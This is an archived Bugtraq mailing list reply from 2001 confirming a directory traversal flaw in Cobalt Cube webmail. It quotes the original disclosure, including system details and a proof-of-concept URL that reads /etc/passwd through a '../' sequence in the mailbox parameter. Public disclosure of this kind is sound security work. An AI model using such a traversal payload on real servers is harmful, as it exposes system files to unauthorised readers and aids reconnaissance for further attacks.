Bugtraq mailing list archives
Re: Cobalt Cube Webmail directory traversal
From: John <johns () tampabay rr com>
Date: Tue, 10 Jul 2001 18:37:55 -0400
I confirmed this on Cobalt's, now Sun, Cube III. Paul Marshall wrote:
At 08:41 05/07/2001, you wrote: I just got a new Cobalt Cube today and I have been poking around at it for security issues... I noticed this minor issue in the webmail system. Your users are not aloud to have shell access by default however if they malform their mailbox requests they can read local files with the perms of the webserver. If your users have shell access they will not really be gaining anything however this could be used to remotely gather information for a future attack. [admin admin]$ uname -a Linux cube.ckfr.com 2.2.16C7 #1 Fri Sep 8 15:58:03 PDT 2000 i586 unknown [admin admin]$ cat /etc/issue Cobalt Linux release 6.0 (Carmel) Kernel 2.2.16C7 on an i586 http://YOURCOBALTBOX:444/base/webmail/readmsg.php?mailbox=../../../../../../ ../../../../../../../../etc/passwd&id=1 -KF
-- The events which transpired five thousand years ago; Five years ago or five minutes ago, have determined what will happen five minutes from now; five years
From now or five thousand years from now.
All history is a current event. - Dr John Henrik Clake -
Current thread:
- Cobalt Cube Webmail directory traversal KF (Jul 05)
- Re: Cobalt Cube Webmail directory traversal Paul Marshall (Jul 09)
- Re: Cobalt Cube Webmail directory traversal John (Jul 10)
- Re: Cobalt Cube Webmail directory traversal Paul Marshall (Jul 09)